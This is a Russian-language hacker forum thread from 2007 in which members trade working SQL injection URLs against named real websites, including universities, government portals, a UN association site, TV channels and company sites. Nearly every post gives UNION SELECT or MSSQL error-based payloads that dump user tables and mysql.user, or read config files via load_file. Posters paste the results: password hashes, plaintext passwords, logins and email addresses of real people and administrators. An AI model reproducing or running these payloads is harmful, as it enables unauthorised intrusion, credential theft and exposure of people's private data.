Сайт: http://www.kafedra.com.ua/
уязвимость: http://www.kafedra.com.ua/modules/dictionary/detail.php?id=885'
таблица: xoops_users
подобранные поля: uname,pass,email,uid
26 организмов
http://www.kafedra.com.ua/modules/dictionary/detail.php?id=-885+union+select+1,2,3,concat_ws(0x3a,uid,uname,pa ss,email),5,6+from+xoops_users/*1:insight:af743111422bd5bb3e8bd5618b12bbae
админкаhttp://www.kafedra.com.ua/admin.phpтаблица: ibf_members
подобранные поля: name,password,email,id
3121 организм
http://www.kafedra.com.ua/modules/dictionary/detail.php?id=-885+union+select+1,2,3,concat_ws(0x3a,id,name,pass word,email,website),5,6+from+ibf_members/** На сайте поставили новый форум vBulletin, от него таблицы не нашел.
_Pantera_
07.05.2007, 22:39
Занесло блин случайно на сайт правительства
http://www.lisburncity.gov.uk/your-city-council/council-minutes-and-reports/index.php?id=-4+union+select+1,2,concat(user,char(58),password), 4,5,6+from+mysql.user/*&sr=540'&month=&year=&search_keyword=&freshform=no
root:03e6ff876dd3e5b1
http://una.ge/eng/artdetail.php?group=articles&id=102%20UNION%20SELECT%201,2,concat(loginname,0x3 a,password),4,5,6,7,8,9%20from%20phplist_admin%20l imit%201,1/*
или так
http://una.ge/eng/artdetail.php?group=articles&id=102%20UNION%20SELECT%201,2,concat(name,0x3a,pas swd),4,5,6,7,8,9%20from%20user%20limit%201,1/*
вот еще
http://rustavi2.com/news/news_text.php?id_news=20582%20UNION%20SELECT%201,2 ,3,4,5,usrname,pass,8,9,10,11,12%20from%20users_p% 20limit%201,1/*
Кстати прошу бережно отнестись к этому... т.к. первое - это сайт организации объединенных наций (una) а второй самый мзвестный в грузии телеканал... (типа нашего первого)
KPOT_f!nd
08.05.2007, 06:50
www.dfalink.com
http://www.dfalink.com/group.php?id=-775+union+select+1,password,zip,4,5,email,id,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,24,24,25,26, 27+from+members/*
лимит в помощь
www.trikhin.ru
http://www.trikhin.ru/index.php?rn_id=-39+union+select+1,2,3,4,5,6,7+admin/*
таблицa: user
www.e30club.ru
http://www.e30club.ru/index.php?id=-13+union+select+1,2,3,4,5,6,7+from+ds_e30club_page/*
Joker-jar
08.05.2007, 18:29
mr.The,
http://artbridge.ru/show_concurs.php?id=-1+union+select+1,2,3,concat(login,char(58),passwor d,char(58),email,char(58)),5,6,7,8,9,10,11,12,13,1 4+from+users+limit+10/*
459 записей.
novdelo.ru
http://www.novdelo.ru/advertnews.php?id=-1+union+select+1,2,concat(login,0x3a,pwd),4,5,6,7, 8,9,10,11,12,13,14+from+users/*
Joker-jar
ээээ у меня выдаёт
Database error in vCard Lite:
Invalid SQL: SELECT * FROM konkurses WHERE id=-1 union select 1,2,3,concat(login,char(58),passwor d,char(58),email,char(58)),5,6,7,8,9,10,11,12,13,1 4 from users limit 10/*
mysql error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'd,char(58),email,char(58)),5,6,7,8,9,10,11,12,13, 1 4 from user
mysql error number: 1064
Date: 2007/05/08 - 07:57:20 PM
Script: /show_concurs.php?id=-1+union+select+1,2,3,concat(login,char(58),passwor %20%20d,char(58),email,char(58)),5,6,7,8,9,10,11,1 2,13,1%20%204+from+users+limit+10/*
Referer:
Constantine
08.05.2007, 23:31
Произведено обновление Антибояна. Незабываем проверять иньекции на предмет боянности
- http://hlamidnik.h18.ru/SQLS.html
Constantine
09.05.2007, 00:11
\\скуль от меня\\
http://www.autohalle24.de/include/include.php?id=-019+union+select+char(1),concat_ws(0x3a,user(),ver sion(),database()),null,null,null/*
Серенький
09.05.2007, 01:11
Константин, готово
http://slil.ru/24347122
со 199 по эту.
Выводит юзеров и пассы (в открытом виде). Так же мыла. Админа не нашёл, хотя особо не искал.
http://www.sota1.ru/week_news.php3?News_id=-17012+union+select+1,2,3,4,5,6,7,concat(login,0x3a ,password,0x3a,email),9+from+user+limit+1,1
Открыт доступ к таблицам user & users. (они идентичны). Закрыт доступ к таблицам mysql.user & mysql.users.
Админка: http://www.sota1.ru/phoneadmin
Форум: http://www.sota1.ru/phorum
К админке пассы выводимые из таблицы user конечно не подходят. Таблицы phorum.user & phpbb.user тоже закрыты.
_Pantera_
09.05.2007, 11:52
']
Открыт доступ к таблицам user & users. (они идентичны). Закрыт доступ к таблицам mysql.user & mysql.users.
Таблиц mysql.user & mysql.users просто - напросто не существует в этой базе данных
К админке пассы выводимые из таблицы user конечно не подходят. Таблицы phorum.user & phpbb.user тоже закрыты.
phorum.user & phpbb.user таких тоже не существует.
http://www.sota1.ru/week_news.php3?News_id=-17012+union+select+1,2,3,4,5,6,7,concat(username,c har(58),user_password,char(58),user_icq),9+from+ph pbb_users+limit+1,1/*
MobileServ:d79096188b670c2f81b7001f73801117
_________________________
добавление от Hawkins
MobileServ:d79096188b670c2f81b7001f73801117 - passw
Серенький
09.05.2007, 12:49
Xage.ru (молодежный портал)
смотрим версиюhttp://xage.ru/comments.php?id=1708+and+1=0+union+select+1,2,3,co ncat_ws(0x3a,user(),version(),database()),5,6,7,8, 9,0,1,2,3,4/* а она пятая. (вывод в строке поиска).
смотрим таблицыhttp://xage.ru/comments.php?id=1708+and+1=0+union+select+1,2,3,ta ble_name,5,6,7,8,9,0,1,2,3,4+from+information_sche ma.tables+limit+252,1/* так навскидку обращаем внимание на таблицы access, administrator, exp_members, user.
аналогично смотрим поля в таблицахhttp://xage.ru/comments.php?id=1708+and+1=0+union+select+1,2,3,co ncat_ws(0x3a,username,password),5,6,7,8,9,0,1,2,3, 4+from+exp_members+limit+0,1/* в первых двух не нашел ничего интересного, в exp_members есть поля username,password,authcode,email
Admin:5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8
таблица user относится к форуму vB , и поля там соответственные.
1:Admin:f1e82a7d9d6f8a25019349e1982d4f24:W%L:admin @xage.ru
---------------------------------------------------------------------
Я в этом сильно не шарю но помоему скуль тут есть а там сами смотрите... если нет, то пусть модуры удалять...
http://smru.com.ua/globalnews.php?type=n&num=-1579+union+select+1,2,3,concat_ws(0x3a,user(),vers ion(),database()),5/*
----------------------------------------------------------------------
Y.Dmitriy, примеры погляди и все на свои места сразу встанет.
и есчооо
http://khomutynnik.info/view.php?type=list&status=0'&p=1'
http://khomutynnik.info/view.php?type=list&p=1&status=0+and+1=0+union+select+1,2,3,concat_ws(0x3a ,user(),version(),database())/*
Constantine
10.05.2007, 21:54
Идею дал, дораскрутите сами
http://triplebuffer.devmaster.net/file.php?id=-7+union+select+1,2,convert(version()+using+latin1)/*&page=2
Серенький
11.05.2007, 10:37
Фотосайт.ру
http://www.photosight.ru/pforum/showflat.php?Cat=&Board=photo_common&page=0&view=collapsed&sb=5&o=&fpart=all&Number=-658026+union+select+1,2,3,aes_decrypt(aes_encrypt( concat_ws(0x3a,user(),version(),database()),0x55), 0x55)/*
вывод в заголовке, довести до ума не получилось, таблицы не подобрал.
2Серенький
http://www.photosight.ru/pforum/showflat.php?Cat=&Board=photo_common&page=0&view=collapsed&sb=5&o=&fpart=all&Number=-658026+union+select+1,2,3,aes_decrypt(aes_encrypt( concat_ws(0x3a,user,password),0x55),0x55)%20from%2 0mysql.user/*
http://kosmopoisk.org/ufo_technology/show1.html?id=-1+union+select+1,2,3,4,concat(database(),char(58), user(),char(58),version()),6,7,8/*
http://kosmopoisk.org/ufo_technology/show1.html?id=-1+union+select+1,2,3,4,5,6,7,8+from+guestbook/*
http://www.setbook.ru/announces-r.php?id=5499&pageid=-1+union+select+1,2,concat(database(),char(58),user (),char(58),version()),4,5/*
http://www.setbook.ru/announces-r.php?id=5499&pageid=-1+union+select+1,2,concat(username,char(58),user_p assword),4,5+from+phpbb_users+limit+1,1/*
http://www.aqualung.ru/konkurs.php?photo=-1+union+select+1,convert(concat(database(),char(58 ),user(),char(58),version()),char),3,4,5,6,7,8/*
Joker-jar
11.05.2007, 18:49
Предлагаю Вашему вниманию очень пикантную скулю :). Федерация хоккея России. PHP-скрипт имеет права рута доступа к мускулу, поэтому можно творить очень многое, а именно:
http://www.1tvcup.fhr.ru/news/?id=-1+union+select+1,2,3,concat(user,':',password)+fro m+mysql.user/*
Хотя есть и более простой способ увести пароль от MySQL - через конфиг phpbb :) (Смотреть "исходники" страницы)
http://www.1tvcup.fhr.ru/news/?id=-1+union+select+1,2,3,load_file('/home/www/htdocs/www/conf/config.php')/*
А вот и юзвери форума:
http://www.1tvcup.fhr.ru/news/?id=-1+union+select+1,2,3,concat(username,':',user_pass word,':',user_icq)+from+home.phpbb_users+limit+1/*
Ну и конечно, админы, там их докуя фроде
http://www.1tvcup.fhr.ru/news/?id=-1+union+select+1,2,3,concat(login,'%20:%20',passwo rd,'%20:%20',comment)+from+online_feb.fhr_admins+l imit+0,1/*
Также отлично работает into outfile.
P.S. Пожалуйста, не хакайте, только ознакамливаемся.
Constantine
11.05.2007, 20:43
5-я версия мускула, лимит в помощь, 30 таблиц.. ответ где то там)
http://www.maplestoryatlas.com/field.php?id=-33+union+select+1,TABLE_NAME,version()+from+INFORM ATION_SCHEMA.TABLES+limit+1,1/*
Здесь все тривиально
http://tenleaders.com/field.php?id=-12+union+select+concat_ws(char(58),user,password), 2,3+from+mysql.user/*
edu-all.ru
http://www.edu-all.ru/pages/forum/thread.asp?idthr=1'+or+1=(SELECT+TOP+1+TABLE_NAME+ FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NO T+IN+('dtproperties','clients','posting','sysconst raints','syssegments','tems','thread'))--
http://www.edu-all.ru/pages/forum/thread.asp?idthr=1'+or+1=(SELECT+TOP+1+COLUMN_NAME +FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME= 'clients'+AND+COLUMN_NAME+NOT+IN+('akt_cl','col_cl ','comment_cl','dateend_cl','dateup_cl','dats_cl', 'dog_cl','har_cl','id_cl','mesto_cl','name_cl','op l_cl','sh_cl','srok_cl','st_cl','vid_cl'))--
_хмм_
KPOT_f!nd
12.05.2007, 21:12
http://www.turkuaz.us/news_det.php?newsId=-587+union+select+1,user(),database(),version(),5,6 ,7,8,9/*&catId=32
http://lonuestro.us/sectionfiles/article.php?id=-218+union+select+1,database(),version(),4,5,6,7,us er(),9,10,11,12/*
так сильно не увлекался находкой таблиц. . .
Чтобы увидеть скулю, нужна регистрация.
Для тех, кому влом регистрироваться -
Login - kokok
Pass - 123456
http://www.myflavour.nl/forum.php?view=write&tid=748&action=reply"e=-20244%20union%20select%201,2,user()/*
http://www.geelix.com/hud.php?id=-238622154%20union%20select%201,2,concat_ws(char(58 ),idUser,logins,email,passw)%20from%20user/*
http://www.cbisis.be/baptises.php?an=-1992%20union%20select%20id,concat_ws(char(58),user name,password,email,icq),3,4%20from%20cbisis.forum _users/*
KPOT_f!nd
13.05.2007, 10:11
http://www.parks.it/news/dettaglio.php?id=-1221+union+select+1,user,password,4,user(),6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20+from+mysql.user/*
root:0a9236882f7cf8a1
massimo@www.comunic.it
Серенький
13.05.2007, 17:33
http://www.naturmed.ru
mysql 5
смотрим таблицы http://www.naturmed.ru/index.php?id=2&subid=-1+union+select+table_name+from+information_schema. tables+limit+24,1/* смотрим количество таблиц http://www.naturmed.ru/index.php?id=2&subid=-1+union+select+count(table_name)+from+information_ schema.tables/* их всего 25, но что-то ни черта интересного среди них не нашел.
Пелевин http://pelevin.nov.ru
http://pelevin.nov.ru/inews/index.php?n=-1161008436+union+select+1,2,3,4,concat_ws(0x3a,use r(),version(),database()),6/*
[53x]Shadow
14.05.2007, 03:12
Продолжаем тему выпускников ;)(Предыдущие МГИМО и МФТИ) Коллекция пополняется!
Теперь НГТУ(Новочеркасск)
www.ngtu.ru
http://www.ngtu.ru/info/info.php?id=-1+ union+select+database() ,user(),version(),4,5 ,6,7,8,9,10,11,12,13,14,15,16/*
http://www.ngtu.ru/info/info.php?id=-1+unio n+select+email,icq,passw,4,5 ,6,7,8,9,10,11,12,13,14,15,16+from+users/*
Все стандартно аськи, почта, пароли (в открытом виде). Пользователей 4055!
KPOT_f!nd
14.05.2007, 03:30
___[53x]Shadow
http://www.ngtu.ru/info/info.php?id=-1+union+select+username,user_password,user_icq,use r_email,5,6,7,8,9,10,11,12,13,14,15,16+from+phpbb_ users/*
[53x]Shadow
14.05.2007, 19:56
МИФИ
www.mephi1996.ru
http://www.mephi1996.ru/news.php?id=-1+union+select+1 ,user(), 3,version(),5,database()/*
user: tyurin@192.168.0.1
version: 4.0.27
database: tyurin
Нашел еще таблицу users, правда похоже права на select нет :(
http://www.fof.ru/model.php?id=1+and+1=-1+union+select+1,2,3,null,concat(user,0x3a,passwor d),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34+from+mysql.use r/*
root:51aa86276d773238:66j89
Серенький
14.05.2007, 23:56
http://www.progz.ru/
http://www.progz.ru/articles.php?issue=-5+union+select+1,2,3,name,5,6,7,8,9,0+from+users/*http://ecoportal.ru/http://ecoportal.ru/conf.php?id_conf=-734+union+select+1,2,3,4,concat_ws(0x3a,user(),ver sion(),database()),6,7,8,9,0,1,2,3,4,5,6,7,8,9+fro m+user/*http://www.prokredo.ru/ mysql 5http://www.prokredo.ru/collegefaculty.php?id=-16%20union%20select%201,concat_ws(0x3a,id,login,pa ssword,email,name,priv),3,4,5,6,7,8,9,0,1,2,3,4+fr om+kredo_admins+limit+0,1/*1:mooncat:sql:atarskov@ipsoft.ru:Andrey Tarskov:1
KPOT_f!nd
15.05.2007, 07:21
http://www.acconcept.ru/news/news.php?id=-124+union+select+1,passwd,3,4,membername,6,7,8+fro m+smf_members/*
d286012284d40b859c81b773c260ea4d03821c1c:Natali
53f6dbb9fd0bb1e45bdb114ffdeb5167bec445d1:mofa
be1e6dcf9cd70f318bad866c521bc3bb8750889d:Rust
924e378db9cb2016fcb0e813ce6bcc735cc3461b:Fadin Denis
a119561acfc07337fdf05ce695343532c011df58:Alexander .A.Sorokin
52a4a8123268ee014ce79b8e7cb30e4f70918858:SFU
e93b7fe16991598e7bc523fba140adce6ffcb303:KamV
156da86923db93bf020958f39991fbd3b73d490c:Алек ей Целищев
c960e53946d1c4ea02c5516c82d20d0e52e6999a:reduhin
824ef2d6d0aaf1eb500fdfb4e5aa7c1673ca7895:Андр й
a3497dbf28bb4a05e88feea07efed24b150fc638:NIKITA
0af4ae9b26fb793e93ca52f9735fe4aae9cb1931:елис енко
a01249b67aa2af18b39cf1c6513b8f621ecf63c2:Кучк ров
c78840fd55285ff4d96d8f15016fd2de6ef9b717:DRIGGER
660b797b6e8d6ebf4e7e483069b973c5ba564d3a:lzanuda
a13d103e2ddbdfeb417c3843c55d2aca7d7adb4c:сини ка
Napalmed - http://www.oppozicia.com/index.php?lang=1&part_id=39&year_id=2007&month_id=-01+union+select+1,concat(user(),0x3a,version(),0x3 a,database()),3/*
admins/users - еще есть форум, походу самописный...
dadunnnt
15.05.2007, 15:06
Чёт я никак не пойму вродибы подобрал а уязвимость не проявляется !
http://www.oppozicia.com/index.php?lang=1&part_id=39&year_id=2007&month_id=-01+union+select+1,2,3/*
[53x]Shadow
15.05.2007, 15:22
Во моя первая на MSSQL
eres.geneseo.edu
http://eres.geneseo.edu/library/research/metajournalsearch.asp?lettersearch=b'+or+1=@ @version- -
Имя БД: Serials
Имя пользователя: Serials
Версия: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
Находим все таблицы:
http://eres.geneseo.edu/library/research/metajournalsearch.asp?lettersearch=b'+or+ 1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA .TABLES+WHERE+TABLE_NAME+NOT+IN+('VALID_SUBJECT_CO DES','dtproperties','eJournals','Item_Subject_Link er','LIBRARY_COMPLETENESS','LIBRARY_INDEX','LIBRAR Y_LOCATION','LIBRARY_PUBLICATION','LIBRARY_REORDER ','LIBRARY_STATUS','LIBRARY_SUBJECT','LIBRARY_TITL E','pJournals','Sfx_e_journals','sJournals','Subje ct_Codes','sysconstraints','syssegments','VALID_BU ILDING_CODES','VALID_COLLECTION_CODES','VALID_INDE X_CODES'))- -
Интересных таблиц не увидел, по этому для примера
Столбцы таблицы eJournals
http://eres.geneseo.edu/library/research/metajournalsearch.asp?lettersearch=b'+or+ 1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEM A.COLUMNS+WHERE+TABLE_NAME='eJournals'+AND+COLUMN_ NAME+NOT+IN+('ID','Location','Title','Dates','Data base','Building','Collection','Volumes_Held','Free '))- -
dadunnnt
15.05.2007, 16:11
хороший сайт =)
http://apelsinclub.ru/show.php?event=-403+union+select+1,2,3,VERSION(),5,6,7/*
+1 - 5 версия.
Вывод данных:
http://www.oppozicia.com/index.php?lang=1&part_id=39&year_id=2007&month_id=-01+union+select+1,concat(nickname,char(58),email,c har(58),passwd),3%20from%20forum_users/*
http://www.oppozicia.com/index.php?lang=1&part_id=39&year_id=2007&month_id=-01+union+select+1,concat(user_login,char(58),user_ email,char(58),user_pass),3%20from%20users_ru/*
http://www.oppozicia.com/index.php?lang=1&part_id=39&year_id=2007&month_id=-01+union+select+1,concat_ws(char(58),absnum,level, position,name,alias,approved,description),3%20from %20admins/*
Joker-jar
15.05.2007, 16:43
Shadow']Все там с выводом, глаза разуйте, или посмотрите чуть выше пост крота!
Если запрос:
http://www.oppozicia.com/index.php?lang=1&part_id=39&year_id=2007&month_id=-01+union+select+1,2,3/*
То на странице:
Народная оппозиция 2 - это и есть вывод!
Сорри, затупил. С кем не бывает? :)
http://mp3-portal.p8.ru/showlyric.php?id=-1'+union+select+1,2,convert(concat(user,0x3a,passw ord)+using+cp1251),4,5,6,7+from+mysql.user/*&char=193
хеши mysql-5, версия 4.1* =)
Вот http://www.referats.info/worx.php?pnum=42+union+select+1,2,3,4/*
Вроде 4, а че дальше так и невкурил (я новичек)! Мож кто продолжит)!
dadunnnt
15.05.2007, 21:17
Вот http://www.referats.info/worx.php?pnum=42+union+select+1,2,3,4/*
Вроде 4, а че дальше так и невкурил (я новичек)! Мож кто продолжит)!
http://www.referats.info/worx.php?pnum=42+union+select+1,2,3,4,DATABASE(),6 ,7,8,9,10,11,12/*
USER() : rossorig_superus@localhost
VERSION() : 4.0.27-log
DATABASE() : rossorig_agbook1
Вот, погуглил немного:
http://www.tectonic.co.za/view.php?id=99999999+union+select+1,concat(char(39 ,60,104,51,62,39),username,0x3a,password,0x3a,emai l),3,4+from+users
http://intercar.com.ua/index.php?id=-1+union+select+1,2,3,4,5,6+from+users
http://pressa.univ.kiev.ua/news.php?id=-1+union+select+1,2,3,4
http://www.climb.com.ua/aboutbook.php?id=-1+union+select+1,2,3,4,5,6
Здесь админку не могу найти. Есть cpanel, тока к нему не подходит =\
http://www.a2k.org.ua/news.php?id=-1+union+select+1,2,3,4,concat(user,0x3a,password,0 x3a,email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36, 37,38+from+users&lng=ua
user: admin
pass: repz
Если что-то уже было - ссори за боян :)
http://www.dancenter.ru/articals.php?id=30'
Серенький
16.05.2007, 11:56
www.razvod.ru (4)
phpbb_users (username, user_password, etc.)
http://www.razvod.ru/woman.php?id=-597+union+select+1,2,3,concat_ws(0x3a,user_id,user name,user_password,user_email),5,6,7,8,9+from+phpb b_users+limit+0,1/*
ps sob@ke
http://www.dancenter.ru/articals.php?id=30' уже было
http://www.minton.com.tr/html/urun.asp?urun=456465+union+select
есть такая фирма у турок: Minton называется гы. Не смог тейбл подобрать :(
http://www.bonus.ru/video/index.phtml?film_id=999999999+union+select+1,2,con vert(concat(database(),char(58),user(),char(58),ve rsion()),char),4,5,6,7,8,9,10,11/*
-------------
http://film.topd.ru/details.php?Id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(d atabase(),char(58),user(),char(58),version()),14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28/*
-------------
http://www.studentport.su/referat/cardinfo.php?id_card=-1+union+select+1,2,convert(concat(database(),char( 58),user(),char(58),version()),char),4,5,6,7,8,9,1 0,11,12/*
http://www.studentport.su/referat/cardinfo.php?id_card=-1+union+select+1,2,convert(concat(user,char(58),pa ssword),char),4,5,6,7,8,9,10,11,12+from+mysql.user/*
-------------
http://www.natc.ru/clubs/forsazh/paper/?view=true&id=-1+union+select+1,2,3,4,5,6,7,8,concat(database(),c har(58),user(),char(58),version()),10,11,12,13,14/*
-------------
http://teo.poliglos.info/main.php?id='+union+select+concat(database(),char( 58),user(),char(58),version())/*
Интересных таблиц не нашел:
http://teo.poliglos.info/main.php?id='+union+select+table_name+from+informa tion_schema.tables+limit+45,1/*
-=lebed=-
16.05.2007, 19:00
http://www.apahelpcenter.org/articles/article.php?id=-123+union+select+1,version(),user(),4,5/*
P.S. заюзал антибоян только щас... скуля-боян. :mad:
Department of Social Welfare and Development
DSWD Bldg., Constitution Hills, Batasan Complex, Q.C., Philippines
http://www.dswd.gov.ph/faqdetails.php?id=-1 union select 1,concat(user,CHAR(64),host,CHAR(58), password),3,4,5,6 from mysql.user/*
Серенький
16.05.2007, 21:45
antigreen.ru
http://antigreen.org/index.php?index=-12+union+select+1,concat_ws(0x3a,user(),version(), database())/*
ХЭttp://tik.ru/pages/search.php?search=%27
TABLE_NAME:
tik_pages
tik_users
TABLE_STRUCT (tik_users):
1, 2, 3, pass, login, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18
Интересная игрушка :)
Дыры множественные в разных скриптах, в том числе межсайтовый скриптинг, инъекции.
Серенький
16.05.2007, 23:45
Коррозия Металла
http://www.korroziametalla.com/
уязвимость: http://www.korroziametalla.com/news_arh.php?year=2007&id=49'
-> mysql 5
смотрим таблицы стандартными средствами пятой версии: http://www.korroziametalla.com/news_arh.php?year=2007&id=-49+union+select+1,2,3,table_name,5+from+informatio n_schema.tables+limit+0,1/* находим обращаем внимание на kor_forum и kor_admin. смотрим колонки аналогичным образом, потом смотрим в них и видим логин/пароль, пароль в незашифрованном виде http://www.korroziametalla.com/news_arh.php?year=2007&id=-49+union+select+1,2,3,concat_ws(0x3a,id,login,pass word),5+from+kor_admin+limit+0,1/* админкаhttp://www.korroziametalla.com/admin/
Department of Social Welfare and Development
DSWD Bldg., Constitution Hills, Batasan Complex, Q.C., Philippines
http://www.dswd.gov.ph/faqdetails.php?id=-1 union select 1,concat(user,CHAR(64),host,CHAR(58), password),3,4,5,6 from mysql.user/*
root@localhost:299ce3c1618fe6e4
pass:zaq12345
http://www.dubovoe.ru/print.php?news_id=-1+union+select+1,2,3,4,5,6,concat(database(),char( 58),user(),char(58),version()),8,9,10,11,12,13,14, 15/*
http://campus4.best-host.ru/index.php?news=-1+union+select+1,2,3,4,5/*
VampiRUS
17.05.2007, 13:19
http://www.rosdiplom.ru/readyi2a1a2.asp?id=9966)+or+1=(SELECT+TOP+1+cast(U serName+as+nvarchar)%2B%27%3A%27%2Bcast(Password+a s+nvarchar)%2B%27%3A%27%2Bcast(id+as+nvarchar)+FRO M+%C0%E4%ec%e8%ed%e8%f1%f2%f0%e0%f2%ee%f0%fb)--
Админку найти несмог(, хеши это md5 урезаные до 30 символов, у первых 6 человек один и тот же пароль 123(ещё бы знать его куда воткнуть :) ), дальше несмотрел
http://boravet.com/yazi.php?id=-1+union+select+1,0x3C68313E2A425241564F2A3C2F68313 E,3,4/*
*BRAVO* :D
http://spbclub.ru/cgi-bin/group_news/view.pl?id=-1+union+select+1,aes_decrypt(aes_encrypt(concat(lo gin,0x3a,password),0x71),0x71),3,4+from+users+limi t+1,9000/*
красиво :)
p.s. дальше не копал. пользователей там много :) mysql.user закрыт.
ЛифчиС5СВ
17.05.2007, 16:54
http://doska.911.by
http://doska.911.by/full_info.php?sid=-1+union+select+1/*
[53x]Shadow
17.05.2007, 17:18
http://doska.911.by
http://doska.911.by/full_info.php?sid=-1+union+select+1/*
http://doska.911.by/full_info.php?sid=-1+union+select+convert(concat(version(),char(58),u ser(),char(58),database())+using+binary)/*
:D ;)
http://www.kn.kz/smi.php?id=-1+union+select+1,concat(database(),char(58),user() ,char(58),version()),3/*
Вытянул таблицу с мылом подписчиков:
http://www.kn.kz/smi.php?id=-1+union+select+1,concat(id,char(58),mail),3+from+s ubscribe+limit+0,1/*
------------------------------------------------
http://www.kazakh.ru/talk/mmess.phtml?idt=-1+union+select+1,2,3,4,5,convert(concat(database() ,char(58),user(),char(58),version()),char),7,8,9/*
Серенький
17.05.2007, 17:32
Сообщение от ЛифчиС5СВ
http://doska.911.by
Код:
http://doska.911.by/full_info.php?sid=-1+union+select+1/*
там есть табличка admin и две записи в ней:
http://doska.911.by/full_info.php?sid=-1+union+select+aes_decrypt(aes_encrypt(concat_ws(0 x3a,name,pass),0x55),0x55)+from+admin+limit+0,1/*termit:3c033ccb7c93e00b : derevo
arka:4722ddc90d46fc5a : 1972
Серенький
17.05.2007, 18:57
Наш АвтоВАЗ
http://www.avtovaz.ru/
--> mysql 5 http://www.avtovaz.ru/articles_text.php?id=-41'+union+select+1,2,table_name,4,5,6+from+informa tion_schema.tables/* список таблиц на одной странице (всего 74 штуки)
и еще
Накопились
http://www.piknik.info/ALBUMS/cd.php?id=-3+union+select+1,2,3,4,concat_ws(0x3a,user(),versi on(),database()),6,7/* http://www.utamusic.ru/pressa/pressa_detail.php?id=-49+union+select+1,2,3,4,concat_ws(0x3a,user(),vers ion(),database()),6,7,8,9,0/* http://www.varvara-fanclub.ru/foto/?id=-18+union+select+1,concat_ws(0x3a,user(),version(), database()),3,4,5/*http://www.solntseva.com/biblio_detail.php?id=-13+union+select+1,2,concat_ws(0x3a,user_id,usernam e,user_password,user_email)+from+phpbb_users+limit +1,1/* 2:Tatyana:63060e7ed635a6061ea4bc2dea5d06c7:admin@s olntseva.comhttp://www.brilev.ru/news.php?id=-21+union+select+1,2,3,4,concat_ws(0x3a,user(),vers ion(),database()),6,7/* http://www.a-les.ru/klub.php?id=-38+union+select+1,2,concat_ws(0x3a,user(),version( ),database()),4,5,6,7,8,9/* http://www.fondsk.ru/article.php?id=-706+union+select+1,2,3,4,5,6,concat_ws(0x3a,user() ,version(),database()),8,9,0,1,2,3,4,5,6,7,8,9,0,1 ,2,3/* http://www.reforma.kz/index.php?ch_id=-27+union+select+1,2,3,4,5,concat_ws(0x3a,user(),ve rsion(),database()),7,8/*http://www.fishmarket.ru/popup.php?id=-33+union+select+concat_ws(0x3a,user(),version(),da tabase()),2,3,4,5/* -- все mysql 4
[53x]Shadow
17.05.2007, 19:37
Продолжаю тему выпускников!
Сегодня на очереди клуб выпускников
Санкт-Петербургского Государственного Университета /
Ленинградского Государственного Университета им А.А.Жданова.
www.alumni.spbu.ru
База:
http://www.alumni.spbu.ru/man.asp?UID=-1+or+1=@@ version--
version: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
system_user: alumni
db_name: ALUMNI
Таблицы:
http://www.alumni.spbu.ru/man.asp?UID=-1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN('dtproperties ','ALUMNI_HUMOR','ALUMNI_PHOTO','kill_kk','ALUMNI_ FACULTETS','ALUMNI_GBO OK','ALUMNI_JOB','ALUMNI_LOGINS', 'ALUMNI_NEWS','ALUMNI_PEOPLE',' ALUMNI_PEOPLE_PHOTOS','FILTER_IP','PartnerClicks', ' Partners','sysconstraints','syssegments'))--
Интересная таблица ALUMNI_LOGINS, ее столбцы:
http://www.alumni.spbu.ru/man.asp?UID=-1+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_ SCHEMA.COLUMNS+WHERE+TABLE_NAME='ALUMNI_LOGINS'+AN D+COLUMN _NAME+NOT+IN('Code','Lname','FulName','Email','Des cription ','psw'))--
Вытащил только две записи, похоже админы
http://www.alumni.spbu.ru/man.asp?UID=-1+or+1=(SELECT+TOP+1+cast(Code+as+nvarchar)%2B%27% 3A%27%2Bcast(FulName+as+nvarchar)%2B%27%3A%27%2Bca st(psw+as+nvarchar)%2B%27%3A%27%2Bcast(Email+as+nv archar)+FROM+ALUMNI_LOGINS+WHERE+CODE=1)--
1: Nikolay Nikolskiy : soldat88 : nik@tepkom.ru
2: Maxim Kartashev : unknown : perez@tepkom.ru
Интресная вторая таблица ALUMNI_PEOPLE, тут все пользователи.
Да, кстати не забыли кто там учился?
Конечно ВВП! Ну и на сладенькое:
путин:vvp1975:xxxxxxxx: president@kremlin.ru
а пароль не скажу, жить хочется;)
ЛифчиС5СВ
17.05.2007, 20:54
http://www.freecomplex.com
http://www.freecomplex.com/browse.php?cat=-9999+union+select+1,2,concat(user(),0x3a,version() ),4
http://www.bmx.ru/news.php?pg=1&id=278%60 - сказал админам не реагируют....
http://www.absoluteaudio.ru/servis.phtml?id=-1+union+select+1,database(),3,user(),version()/*
Серенький
18.05.2007, 23:34
http://www.fkska-rostov.ru/http://www.fkska-rostov.ru/new.php?id=-286+union+select+1,2,3,4,aes_decrypt(aes_encrypt(c oncat_ws(0x3a,user(),version(),database()),0x55),0 x55),6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4/*
http://museon.ru/sbnews/index.php?a=viewnews&news=-1+union+select+1,2,concat(database(),char(58),user (),char(58),version()),4,5,6,7,8,9,10,11/*
